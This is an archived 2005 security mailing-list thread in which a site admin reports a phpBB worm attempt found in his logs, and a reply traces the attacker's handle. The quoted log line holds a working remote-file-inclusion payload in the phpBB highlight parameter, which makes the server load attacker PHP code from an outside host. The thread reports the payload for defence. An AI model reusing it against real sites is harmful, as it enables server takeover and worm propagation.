Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | Re: New (maybe old?) PhpBB worm about? |
|---|---|
| Date: | Mon, 12 Dec 2005 14:38:48 -0500 |
Interestingly enough if you google for a combinations of that log entry you dont get much until you hit "sirh0t". Google turns up quite a bit on this busy fellow as evidenced here: http://www.google.com/search?hl=en&lr=&c2coff=1&q=sirh0t&btnG=Search sirh0t seems to be into defacing phbb forums and a bit of botting. The real entertaining part is when you go to the w00pie.nl (sirh0ts) site, it seems to have been defaced by another group "0x1fe crew" that have a low opinion of our lad sirh0t, I'll leave the content for you to view at: http://w00pie.nl A bit more googling turns up the following: "Five computer hackers in the Netherlands have been handed sentences ranging from work orders to youth detention for disabling a number of websites operated by the Dutch government." http://lists.jammed.com/ISN/2005/03/0090.html Have a nice day. On 12/10/05, Robin <robin@kallisti.net.nz> wrote:
I just noticed these in my logs: 63.193.240.128 - - [11/Dec/2005:01:43:25 +1300] "GET /pbem/viewtopic.php?t=37&highlight=%2527.$poster=include($_GET[m]). %2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 403 1094 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t fuck Aleks)" this is pointing to a phpBB install that I chmod'ed away just recently (it was unused and attracting spam), hence the 403. A quick google for the UA string doesn't show up anything, however the URL that it links to seems to contain a PHP script that at a quick glance uses Google and Lycos to find more phpBB sites and spread to them. (If the yatas.com link is gone, and anyone wants a copy of the file, mail me offlist) I'm also curious to know what the versions vulnerable to this exploit are. -- Robin <robin@kallisti.net.nz> JabberID: <eythian@jabber.kallisti.net.nz> Hostes alienigeni me abduxerunt. Qui annus est? PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8 7175 14D3 6485 A99C EB6D
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | RE: hacked server, DDoS bin installed -- To put it another way..., Tim Hollebeek |
|---|---|
| Next by Date: | Re: hacked server, DDoS bin installed -- To put it another way..., Christine Kronberg |
| Previous by Thread: | New (maybe old?) PhpBB worm about?, Robin |
| Next by Thread: | Re: New (maybe old?) PhpBB worm about?, Alex 'CAVE' Cernat |
| Indexes: | [Date] [Thread] [Top] [All Lists] |